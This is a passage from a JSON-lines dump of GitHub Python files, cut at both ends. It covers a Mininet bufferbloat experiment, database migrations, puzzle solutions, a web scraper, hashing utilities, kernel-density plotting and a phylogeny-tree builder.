list(range(min(a_list), max(a_list)+1))\na_listst = [2, 3, 1, 4, 5]\nprint(is_Consecutive(a_listst))\n","repo_name":"Adharia11/Python-prework","sub_path":"Prework_hw.py","file_name":"Prework_hw.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9859101489","text":"from mininet.topo import Topo\nfrom mininet.node import CPULimitedHost\nfrom mininet.link import TCLink\nfrom mininet.net import Mininet\nfrom mininet.log import lg, info\nfrom mininet.util import dumpNodeConnections\nfrom mininet.cli import CLI\n\nfrom subprocess import Popen, PIPE\nfrom time import sleep, time\nfrom multiprocessing import Process\nfrom argparse import ArgumentParser\nfrom helper import avg, stdev\n\nfrom monitor import monitor_qlen\n\nimport sys\nimport os\nimport math\n\nparser = ArgumentParser(description=\"Bufferbloat tests\")\nparser.add_argument('--bw-host', '-B',\n type=float,\n help=\"Bandwidth of host links (Mb/s)\",\n default=1000)\n\nparser.add_argument('--bw-net', '-b',\n type=float,\n help=\"Bandwidth of bottleneck (network) link (Mb/s)\",\n required=True)\n\nparser.add_argument('--delay',\n type=float,\n help=\"Link propagation delay (ms)\",\n required=True)\n\nparser.add_argument('--dir', '-d',\n help=\"Directory to store outputs\",\n required=True)\n\nparser.add_argument('--time', '-t',\n help=\"Duration (sec) to run the experiment\",\n type=int,\n default=10)\n\nparser.add_argument('--maxq',\n type=int,\n help=\"Max buffer size of network interface in packets\",\n default=100)\n\n# Linux uses CUBIC-TCP by default that doesn't have the usual sawtooth\n# behaviour. For those who are curious, invoke this script with\n# --cong cubic and see what happens...\n# sysctl -a | grep cong should list some interesting parameters.\nparser.add_argument('--cong',\n help=\"Congestion control algorithm to use\",\n default=\"reno\")\n\n# Expt parameters\nargs = parser.parse_args()\n\nclass BBTopo(Topo):\n \"Simple topology for bufferbloat experiment.\"\n def build(self, n=2):\n # create two hosts\n h1 = self.addHost(\"h1\")\n h2 = self.addHost(\"h2\")\n\n # Here I have created a switch. If you change its name, its\n # interface names will change from s0-eth1 to newname-eth1.\n switch = self.addSwitch('s0')\n\n self.addLink(h1, switch, bw=args.bw_host, delay=args.delay, max_queue_size=args.maxq)\n self.addLink(h2, switch, bw=args.bw_net, delay=args.delay, max_queue_size=args.maxq)\n\n# Simple wrappers around monitoring utilities. You are welcome to\n# contribute neatly written (using classes) monitoring scripts for\n# Mininet!\n\ndef start_iperf(net):\n h1 = net.get('h1')\n h2 = net.get('h2')\n print(\"Starting iperf server...\")\n # For those who are curious about the -w 16m parameter, it ensures\n # that the TCP flow is not receiver window limited. If it is,\n # there is a chance that the router buffer may not get filled up.\n server = h2.popen(\"iperf -s -w 16m\")\n client = h1.popen(\"iperf -c %s -t %s > %s/iperf.out\" % (h2.IP(), args.time, args.dir), shell=True)\n\ndef start_qmon(iface, interval_sec=0.1, outfile=\"q.txt\"):\n monitor = Process(target=monitor_qlen,\n args=(iface, interval_sec, outfile))\n monitor.start()\n return monitor\n\ndef start_ping(net):\n # Hint: Use host.popen(cmd, shell=True). If you pass shell=True\n # to popen, you can redirect cmd's output using shell syntax.\n # i.e. ping ... > /path/to/ping.\n h1 = net.get('h1')\n h2 = net.get('h2')\n h1.popen(\"ping -i 0.1 %s > %s/ping.txt\"%(h2.IP(), args.dir), shell=True)\n\ndef start_webserver(net):\n h1 = net.get('h1')\n proc = h1.popen(\"python webserver.py\", shell=True)\n sleep(1)\n return [proc]\n\ndef bufferbloat():\n if not os.path.exists(args.dir):\n os.makedirs(args.dir)\n os.system(\"sysctl -w net.ipv4.tcp_congestion_control=%s\" % args.cong)\n topo = BBTopo()\n net = Mininet(topo=topo, host=CPULimitedHost, link=TCLink)\n net.start()\n # This dumps the topology and how nodes are interconnected through\n # links.\n dumpNodeConnections(net.hosts)\n # This performs a basic all pairs ping test.\n net.pingAll()\n\n qmon = start_qmon(iface='s0-eth2',\n outfile='%s/q.txt' % (args.dir))\n\n # start iperf, webserver, and ping\n start_iperf(net)\n handler = start_webserver(net)\n start_ping(net)\n\n h1 = net.get('h1')\n h2 = net.get('h2')\n\n start_time = time()\n all_times = []\n\n # measure the time it takes to complete webpage transfer\n while True:\n # do the measurement (say) 3 times.\n sleep(5)\n now = time()\n delta = now - start_time\n if delta > args.time:\n break\n print(\"%.1fs left...\" % (args.time - delta))\n for i in range (0,3):\n dl_time = h2.popen('curl -o /dev/null -s -w %%{time_total} %s/index.html' % h1.IP(), shell=True).communicate()[0]\n all_times.append(float(dl_time))\n print(all_times)\n\n # Hint: The command below invokes a CLI which you can use to\n # debug. It allows you to run arbitrary commands inside your\n # emulated hosts h1 and h2.\n # CLI(net)\n\n print(\"The average time:\")\n print(avg(all_times))\n print(\"The standard deviation:\")\n print(stdev(all_times))\n\n # Hint: The command below invokes a CLI which you can use to\n # debug. It allows you to run arbitrary commands inside your\n # emulated hosts h1 and h2.\n # CLI(net)\n\n qmon.terminate()\n net.stop()\n # Ensure that all processes you create within Mininet are killed.\n # Sometimes they require manual killing.\n Popen(\"pgrep -f webserver.py | xargs kill -9\", shell=True).wait()\n\nif __name__ == \"__main__\":\n bufferbloat()\n","repo_name":"teresalee1231/p3","sub_path":"bufferbloat.py","file_name":"bufferbloat.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42874926841","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/86052\n# to right to down to left to up\nd = {0: (0, 1), 1: (1, 0), 2: (0, -1), 3: (-1, 0)}\ncycle = []\n\ndef get_in(p, c):\n if p == 'L':\n c = c - 1 if c - 1 >= 0 else len(d) - 1\n elif p == 'R':\n c = (c + 1) % len(d)\n\n return c\n \ndef go_cycle(depth, y, x, direction):\n global cycle\n \n if depth == 0:\n cycle = []\n elif depth > max_try:\n return 0\n \n if depth > 0:\n cy, cx, cout = cycle[0]\n if cx == x and cy == y and cout == direction:\n print(cycle, y, x, direction)\n return len(cycle)\n \n c = (y, x, direction)\n cycle.append(c)\n\n nx = (x + d[direction][1]) % max_x\n if nx < 0:\n nx = max_x - 1\n\n ny = (y + d[direction][0]) % max_y\n if ny < 0:\n ny = max_y - 1\n\n return go_cycle(depth + 1, ny, nx, get_in(m[ny][nx], direction))\n\ndef solution(grid):\n answer = []\n global m\n global max_try\n global max_x\n global max_y\n \n m = [[c for c in r] for r in grid]\n max_x = len(m[0])\n max_y = len(m)\n max_try = (max_x * max_y) ** 2\n \n for i, c in enumerate(m):\n for j, n in enumerate(c):\n if i == 0:\n answer.append(go_cycle(0, i, j, 1))\n if i == len(m) - 1:\n answer.append(go_cycle(0, i, j, 3))\n if j == 0:\n answer.append(go_cycle(0, i, j, 0))\n if j == len(c) - 1:\n answer.append(go_cycle(0, i, j, 2))\n \n return sorted(list(filter(lambda x: x > 0, answer)))","repo_name":"freean2468/programmers","sub_path":"Programming/Lv.2/빛의 경로 사이클/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32894903037","text":"import torch\nimport sys\nfrom src import fishfactor\nimport random\nimport numpy as np\nimport os\n\ndevice = sys.argv[1]\nn_cells_list = [2, 3, 5, 10, 15, 20]\n\nfor dataset in range(10):\n for intensity_scale in [100, 300]:\n data = torch.load(\n '../../data/simulated/data/shared/{}_{}.pt'\n .format(dataset, intensity_scale))\n\n for n_cells in n_cells_list:\n cells_data = data['coordinates'].query('cell < {}'.format(n_cells)).copy()\n\n torch.manual_seed(1234)\n random.seed(1234)\n np.random.seed(1234)\n\n model = fishfactor.FISHFactor(\n data=cells_data,\n n_factors=3,\n device=device,\n n_inducing=100,\n grid_res=50,\n factor_smoothness=1.5,\n masks_threshold=0.4,\n init_bin_res=5,\n ).to(device=device)\n\n model.inference(\n lr=5e-3,\n lrd=1.,\n n_particles=15,\n early_stopping_patience=100,\n min_improvement=0.001,\n max_epochs=10000,\n save=True,\n save_every=100,\n save_dir='results/multicell/{}_{}_{}/'\n .format(dataset, intensity_scale, n_cells),\n )","repo_name":"bioFAM/FISHFactor","sub_path":"experiments/02_multicell/run_multicell.py","file_name":"run_multicell.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38676242969","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('forum', '0007_auto_20150403_0056'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='thumbnail1',\n field=models.ImageField(null=True, upload_to='profile_images/thumbs/', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='userprofile',\n name='thumbnail2',\n field=models.ImageField(null=True, upload_to='profile_images/thumbs/', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"waiyaki/django-by-example-forum","sub_path":"forum/migrations/0008_auto_20150404_1106.py","file_name":"0008_auto_20150404_1106.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34045426762","text":"# Author: Alejandro Sanchez Uribe\n# Class: BTE 499\n# Date: 22 March 2019\n# Assignment: Assignment 5\n\nimport Deck\nimport random\n\n\ndef simple_shuffle(deck):\n stack1, stack2 = Deck.Deck(), Deck.Deck()\n\n for i in range(deck.size()//2):\n stack1.push(deck.top())\n deck.pop()\n\n for i in range(deck.size()):\n stack2.push(deck.top())\n deck.pop()\n\n for i in range(stack1.size() + stack2.size()):\n if i % 2 == 0:\n deck.push(stack2.top())\n stack2.pop()\n else:\n deck.push(stack1.top())\n stack1.pop()\n\n\ndef fisher_yates_shuffle(deck):\n temp_deck = []\n\n initial_size = deck.size()\n\n for i in range(initial_size - 1):\n node_picked = random.randint(0, deck.size()-1)\n temp_deck.append(deck.getInnerNode(node_picked))\n deck.deleteInnerNode(node_picked)\n\n for card in temp_deck:\n deck.push(card)\n","repo_name":"alex-sa-ur/python-bte499","sub_path":"bte499.hw5.alejandrosanchezuribe/Shuffler.py","file_name":"Shuffler.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2238858796","text":"from bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom time import sleep\r\n\r\ndriver = webdriver.Chrome('chromedriver')\r\ndriver.get('https://www.pimkie.fr/c-accessoires-mode')\r\nsleep(2)\r\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\n\r\nwhile True:\r\n # Scroll down to the bottom.\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n\r\n # Wait to load the page.\r\n sleep(2)\r\n\r\n # Calculate new scroll height and compare with last scroll height.\r\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\n if new_height == last_height:\r\n break\r\n last_height = new_height\r\n\r\nresponse = driver.execute_script(\"return document.documentElement.outerHTML\")\r\nsoup = BeautifulSoup(response,'lxml')\r\napp = soup.find_all('a',class_ = 'thumb-link')\r\nfor x in app:\r\n for y in app.find_all('div',class_ = 'product-name'):\r\n print(y)\r\n \r\n","repo_name":"karansharma002/Discord","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6940739325","text":"\"\"\"empty message\n\nRevision ID: b590f62c7e1c\nRevises: f3f327ab19e9\nCreate Date: 2017-10-14 16:00:05.224665\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'b590f62c7e1c'\ndown_revision = 'f3f327ab19e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('events',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('fullnames', sa.String(length=100), nullable=True),\n sa.Column('mobilenumber', sa.Integer(), nullable=True),\n sa.Column('nationalid', sa.Integer(), nullable=True),\n sa.Column('deptamount', sa.Integer(), nullable=True),\n sa.Column('description', sa.String(length=200), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('fullnames')\n )\n op.create_index(op.f('ix_events_deptamount'), 'events', ['deptamount'], unique=False)\n op.create_index(op.f('ix_events_mobilenumber'), 'events', ['mobilenumber'], unique=True)\n op.create_index(op.f('ix_events_nationalid'), 'events', ['nationalid'], unique=True)\n op.drop_table('deptors')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('deptors',\n sa.Column('id', mysql.INTEGER(display_width=11), nullable=False),\n sa.Column('fullnames', mysql.VARCHAR(length=100), nullable=True),\n sa.Column('mobilenumber', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('nationalid', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('deptamount', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('description', mysql.VARCHAR(length=200), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset=u'latin1',\n mysql_engine=u'InnoDB'\n )\n op.drop_index(op.f('ix_events_nationalid'), table_name='events')\n op.drop_index(op.f('ix_events_mobilenumber'), table_name='events')\n op.drop_index(op.f('ix_events_deptamount'), table_name='events')\n op.drop_table('events')\n # ### end Alembic commands ###\n","repo_name":"crakama/EventsPlanner","sub_path":"migrations/versions/b590f62c7e1c_.py","file_name":"b590f62c7e1c_.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18268108738","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \n \nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if root is None:\n return []\n a = [[] for i in range(2048)]\n depth = 1\n b = self.get_level_order(root, a, depth)\n b[0].append(root.val)\n ans = [el for el in b if el != []]\n return ans\n \n def get_level_order(self, node, a, depth):\n if node is None:\n return a\n children_nodes = self.get_children_nodes(node)\n if children_nodes is not None:\n for children_node in children_nodes:\n a[depth].append(children_node)\n a = self.get_level_order(node.left, a, depth + 1)\n a = self.get_level_order(node.right, a, depth + 1)\n return a\n \n def get_children_nodes(self, node):\n left = node.left\n right = node.right\n if left is None and right is None:\n return None\n if left is None:\n return [right.val]\n if right is None:\n return [left.val]\n return [left.val, right.val]\n","repo_name":"aeglushkov/leetcode-tasks","sub_path":"algorithms/Tree/102. Binary Tree Level Order Traversal/solving.py","file_name":"solving.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26901217155","text":"import base64\nimport hashlib\n\nfrom federatedml.util import LOGGER\n\n\nclass Encode:\n def __init__(self, method, base64=0):\n self.method = method\n self.base64 = base64\n\n self.dist_encode_function = {\n \"md5\": self.__compute_md5,\n \"sha1\": self.__compute_sha1,\n \"sha224\": self.__compute_sha224,\n \"sha256\": self.__compute_sha256,\n \"sha384\": self.__compute_sha384,\n \"sha512\": self.__compute_sha512,\n }\n\n @staticmethod\n def is_support(method):\n support_encode_method = [\"md5\", \"sha1\", \"sha224\", \"sha256\", \"sha384\", \"sha512\"]\n return method in support_encode_method\n\n def __compute_md5(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.md5(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.md5(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha256(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha256(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha256(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha1(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha1(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha1(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha224(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha224(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha224(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha512(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha512(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha512(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha384(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha384(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha384(bytes(value, encoding='utf-8')).hexdigest()\n\n def compute(self, value, pre_salt=None, postfit_salt=None):\n if not Encode.is_support(self.method):\n LOGGER.warning(\"Encode module do not support method:{}\".format(self.method))\n return value\n\n if pre_salt is not None:\n value = pre_salt + value\n\n if postfit_salt is not None:\n value = value + postfit_salt\n return self.dist_encode_function[self.method](value)\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/secureprotol/encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40845563947","text":"import numpy as np\nimport warnings\nfrom scipy import stats\nfrom six import string_types\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import trapz\n\nfrom explore.utils import Proportions\n\n\ntry:\n import statsmodels.nonparametric.api as smnp\n _has_statsmodels = True\nexcept ImportError:\n _has_statsmodels = False\n\n\ndef _univariate_kde(data, shade=False, vertical=False, kernel='gau',\n bw=\"scott\", gridsize=100, cut=3,\n clip=None, legend=True, ax=None, cumulative=False,\n **kwargs):\n \"\"\"\n Computes the KDE of univariate data.\n\n shade : bool, optional\n If True, shade in the area under the KDE curve (or draw with filled\n contours when data is bivariate).\n vertical : bool, optional\n If True, density is on x-axis.\n kernel : {'gau' | 'cos' | 'biw' | 'epa' | 'tri' | 'triw' }, optional\n Code for shape of kernel to fit with. Bivariate KDE can only use\n gaussian kernel.\n bw : {'scott' | 'silverman' | scalar | pair of scalars }, optional\n Name of reference method to determine kernel size, scalar factor,\n or scalar for each dimension of the bivariate plot. Note that the\n underlying computational libraries have different interperetations\n for this parameter: ``statsmodels`` uses it directly, but ``scipy``\n treats it as a scaling factor for the standard deviation of the\n data.\n gridsize : int, optional\n Number of discrete points in the evaluation grid.\n cut : scalar, optional\n Draw the estimate to cut * bw from the extreme data points.\n clip : pair of scalars, or pair of pair of scalars, optional\n Lower and upper bounds for datapoints used to fit KDE. Can provide\n a pair of (low, high) bounds for bivariate plots.\n legend : bool, optional\n If True, add a legend or label the axes when possible.\n cumulative : bool, optional\n If True, draw the cumulative distribution estimated by the kde.\n\n ax : matplotlib axes, optional\n Axes to plot on, otherwise uses current axes.\n kwargs : key, value pairings\n Other keyword arguments are passed to ``plt.plot()`` or\n ``plt.contour{f}`` depending on whether a univariate or bivariate\n plot is being drawn.\n\n Output\n ------\n x: array-like, (n_grid_points, )\n The grid of values where the kde is evaluated.\n\n y: array-like, (n_grid_points, )\n The values of the KDE.\n \"\"\"\n\n # Sort out the clipping\n if clip is None:\n clip = (-np.inf, np.inf)\n\n # Calculate the KDE\n\n if np.nan_to_num(data.var()) == 0:\n # Don't try to compute KDE on singular data\n msg = \"Data must have variance to compute a kernel density estimate.\"\n warnings.warn(msg, UserWarning)\n x, y = np.array([]), np.array([])\n\n elif _has_statsmodels:\n # Prefer using statsmodels for kernel flexibility\n x, y = _statsmodels_univariate_kde(data, kernel, bw,\n gridsize, cut, clip,\n cumulative=cumulative)\n else:\n # Fall back to scipy if missing statsmodels\n if kernel != \"gau\":\n kernel = \"gau\"\n msg = \"Kernel other than `gau` requires statsmodels.\"\n warnings.warn(msg, UserWarning)\n if cumulative:\n raise ImportError(\"Cumulative distributions are currently \"\n \"only implemented in statsmodels. \"\n \"Please install statsmodels.\")\n x, y = _scipy_univariate_kde(data, bw, gridsize, cut, clip)\n\n # Make sure the density is nonnegative\n y = np.amax(np.c_[np.zeros_like(y), y], axis=1)\n\n return x, y\n\n\ndef _statsmodels_univariate_kde(data, kernel, bw, gridsize, cut, clip,\n cumulative=False):\n \"\"\"Compute a univariate kernel density estimate using statsmodels.\"\"\"\n fft = kernel == \"gau\"\n kde = smnp.KDEUnivariate(data)\n kde.fit(kernel, bw, fft, gridsize=gridsize, cut=cut, clip=clip)\n if cumulative:\n grid, y = kde.support, kde.cdf\n else:\n grid, y = kde.support, kde.density\n return grid, y\n\n\ndef _scipy_univariate_kde(data, bw, gridsize, cut, clip):\n \"\"\"Compute a univariate kernel density estimate using scipy.\"\"\"\n try:\n kde = stats.gaussian_kde(data, bw_method=bw)\n except TypeError:\n kde = stats.gaussian_kde(data)\n if bw != \"scott\": # scipy default\n msg = (\"Ignoring bandwidth choice, \"\n \"please upgrade scipy to use a different bandwidth.\")\n warnings.warn(msg, UserWarning)\n if isinstance(bw, string_types):\n bw = \"scotts\" if bw == \"scott\" else bw\n bw = getattr(kde, \"%s_factor\" % bw)() * np.std(data)\n grid = _kde_support(data, bw, gridsize, cut, clip)\n y = kde(grid)\n return grid, y\n\n\ndef _kde_support(data, bw, gridsize='default', cut=3, clip=None):\n \"\"\"Establish support for a kernel density estimate.\"\"\"\n support_min = max(data.min() - bw * cut, clip[0])\n support_max = min(data.max() + bw * cut, clip[1])\n return np.linspace(support_min, support_max, gridsize)\n\n\ndef get_class_kdes(values, classes, ensure_norm=True, **kde_kws):\n \"\"\"\n KDEs for values with associated classes. Computes the KDE of each class\n then weights each KDE by the number of points in each class. Also\n compute the overall KDE.\n\n Output\n ------\n cl_kdes, overall_kde\n\n cl_kdes: dict\n KDE for each class. Keys are class labels.\n\n overall_kde: dict\n Overall KDE (i.e. ignoring class labels)\n \"\"\"\n\n # TODO: do we really need ensure_norm\n\n overall_grid, overall_y = _univariate_kde(values, **kde_kws)\n if ensure_norm:\n overall_y = norm_kde(grid=overall_grid, y=overall_y)\n overall_kde = {'grid': overall_grid, 'y': overall_y}\n\n cl_props = Proportions(classes)\n cl_kdes = {}\n for cl in np.unique(classes):\n cl_mask = classes == cl\n cl_values = values[cl_mask]\n\n cl_grid, cl_y = _univariate_kde(cl_values, **kde_kws)\n\n if ensure_norm:\n cl_y = norm_kde(grid=cl_grid, y=cl_y)\n\n # weight area under KDE by number of samples\n cl_y *= cl_props[cl]\n cl_kdes[cl] = {'grid': cl_grid,\n 'y': cl_y}\n\n return cl_kdes, overall_kde\n\n\ndef norm_kde(grid, y):\n tot = trapz(y=y, x=grid)\n return y / tot\n\n\ndef _univariate_kdeplot(x, y, shade=True, vertical=False,\n legend=True, ax=None, **kwargs):\n \"\"\"Plot a univariate kernel density estimate on one of the axes.\"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n # Make sure the density is nonnegative\n y = np.amax(np.c_[np.zeros_like(y), y], axis=1)\n\n # Flip the data if the plot should be on the y axis\n if vertical:\n x, y = y, x\n\n # Check if a label was specified in the call\n label = kwargs.pop(\"label\", None)\n\n # Otherwise check if the data object has a name\n if label is None and hasattr(x, \"name\"):\n label = x.name\n\n # Decide if we're going to add a legend\n legend = label is not None and legend\n label = \"_nolegend_\" if label is None else label\n\n # Use the active color cycle to find the plot color\n facecolor = kwargs.pop(\"facecolor\", None)\n line, = ax.plot(x, y, **kwargs)\n color = line.get_color()\n line.remove()\n kwargs.pop(\"color\", None)\n facecolor = color if facecolor is None else facecolor\n\n # Draw the KDE plot and, optionally, shade\n ax.plot(x, y, color=color, label=label, **kwargs)\n shade_kws = dict(\n facecolor=facecolor,\n alpha=kwargs.get(\"alpha\", 0.25),\n clip_on=kwargs.get(\"clip_on\", True),\n zorder=kwargs.get(\"zorder\", 1),\n )\n if shade:\n if vertical:\n ax.fill_betweenx(y, 0, x, **shade_kws)\n else:\n ax.fill_between(x, 0, y, **shade_kws)\n\n # Set the density axis minimum to 0\n if vertical:\n ax.set_xlim(0, auto=None)\n else:\n ax.set_ylim(0, auto=None)\n\n # Draw the legend here\n handles, labels = ax.get_legend_handles_labels()\n if legend and handles:\n ax.legend(loc=\"best\")\n\n return ax\n\n\ndef _univariate_conditional_kdeplot(values, classes,\n cl_labels=None,\n cl_palette=None,\n include_overall=True,\n shade=True,\n vertical=False,\n legend=True,\n ax=None,\n kde_kws={},\n kde_plt_kws={}):\n\n cl_kdes, overall_kde = get_class_kdes(values, classes, **kde_kws)\n\n # in case 'overall' is one of the classes\n if 'overall' in np.unique(classes):\n overall_name = ''.join(np.unique(classes))\n else:\n overall_name = 'overall'\n cl_kdes[overall_name] = overall_kde\n\n # plot the KDE for each class\n for cl in cl_kdes.keys():\n _kwargs = kde_plt_kws.copy()\n _kwargs['shade'] = shade\n\n x = cl_kdes[cl]['grid']\n y = cl_kdes[cl]['y']\n\n if cl_palette is not None and cl in cl_palette:\n _kwargs['color'] = cl_palette[cl]\n\n if cl_labels is not None and cl in cl_labels:\n _kwargs['label'] = cl_labels[cl]\n else:\n _kwargs['label'] = cl\n\n if cl == overall_name:\n if not include_overall:\n continue\n\n _kwargs['ls'] = '--'\n\n # _kwargs['alpha'] = .2\n _kwargs['zorder'] = 1\n _kwargs['label'] = None # 'overall'\n _kwargs['color'] = 'gray'\n _kwargs['shade'] = False\n\n _univariate_kdeplot(x=x, y=y,\n vertical=vertical,\n legend=legend, ax=ax, **_kwargs)\n","repo_name":"idc9/explore","sub_path":"explore/viz/kde.py","file_name":"kde.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15441989321","text":"num = int(input())\ncoins = list(map(int, input().split()))\nmemo = []\nfinal_memo = []\ndef combinations(arr, n): \n result =[] \n if n == 0: \n return [[]] \n \n for i in range(0, len(arr)): \n elem = arr[i] \n rest_arr = arr[i + 1:] \n for C in combinations(rest_arr, n-1): \n result.append([elem]+C) \n \n return result\n\nfor i in range(num):\n memo.append(combinations(coins, i+1))\n\nfor i in range(num):\n for j in range(len(memo[i])):\n sum_elem = sum(memo[i][j])\n final_memo.append(sum_elem)\n\nprint(memo)\nprint(final_memo)\n\n\nfor i in range(1,100000):\n if i not in final_memo:\n print(i)\n break\n\n\n\n ","repo_name":"elice-python-coding/jyp","sub_path":"11-4.py","file_name":"11-4.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17989755569","text":"import librosa.display\r\nimport librosa\r\n\r\n''' script extracting song chromagram '''\r\ndef extract_chromogram(path):\r\n signal, sample_rate = librosa.load(path)\r\n chromogram = librosa.feature.chroma_stft(signal,\r\n # n_fft=frame_size,\r\n # hop_length=hop_length,\r\n sr=sample_rate)\r\n return chromogram\r\n","repo_name":"alexandrova-s/Mash-up-Generator","sub_path":"chromagram.py","file_name":"chromagram.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35505962256","text":"from pandas import read_csv\nfrom os import system\nimport argparse\n\n\ndef like_entropy(group, c_features):\n if len(group) == 0:\n return []\n max_many = 0\n feature = []\n for f in c_features:\n have = group[group[f] == 1]\n no_have = []#group[group[f] == 0]\n x = max(len(no_have), len(have))\n if x > max_many:\n max_many = x\n feature = [f]\n elif x == max_many:\n feature += [f]\n return feature\n\n \ndef divide_conquer(group, c_features, tree, ancestor_count):\n dividing_feature = like_entropy(group, c_features)\n if dividing_feature == []:\n if len(list(group['Especie'])) == 1:\n return list(group['Especie'])[0], tree, ancestor_count\n else:\n return list(group['Especie']), tree, ancestor_count\n f = dividing_feature[0]\n group1 = group[group[f] == 1]\n group2 = group[group[f] == 0]\n \n last_features = list(c_features)\n last_features.remove(f)\n\n if 0 in [len(group1), len(group2)]:\n if len(group1) == 0:\n ancestor, tree, ancestor_count = divide_conquer(group2, last_features, tree, ancestor_count)\n else:\n ancestor, tree, ancestor_count = divide_conquer(group1, last_features, tree, ancestor_count)\n ancestor_count += 1\n ancestor_name = 'ancestor_{}'.format(ancestor_count)\n tree[ancestor_name] = [ancestor, f]\n else:\n # ca = common ancestor\n if len(group1) == 1:\n ca1 = list(group1['Especie'])[0]\n else:\n ca1, tree, ancestor_count = divide_conquer(group1, last_features, tree, ancestor_count)\n if len(group2) == 1:\n ca2 = list(group2['Especie'])[0]\n else:\n ca2, tree, ancestor_count = divide_conquer(group2, last_features, tree, ancestor_count)\n\n ancestor_count += 1\n ancestor_name = 'ancestor_{}'.format(ancestor_count)\n tree[ancestor_name] = [ca1, ca2, f]\n return ancestor_name, tree, ancestor_count\n\n\ndef build_graphviz(node, tree):\n try:\n soon, feature = tree[node][0], tree[node][-1]\n except Exception:\n return ''\n branch = build_graphviz(soon, tree)\n graphviz = branch + '\\t{} -> {} [label=\"{}\"]\\n'.format(node, soon, feature)\n other_soon = tree[node][1:-1]\n for soon in other_soon:\n branch = build_graphviz(soon, tree)\n graphviz += branch + '\\t{} -> {}\\n'.format(node, soon)\n return graphviz\n\nif __name__ == '__main__':\n # construct the argument parser and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--csv\", required=True, help=\"Path to input CSV file\")\n ap.add_argument(\"-o\", 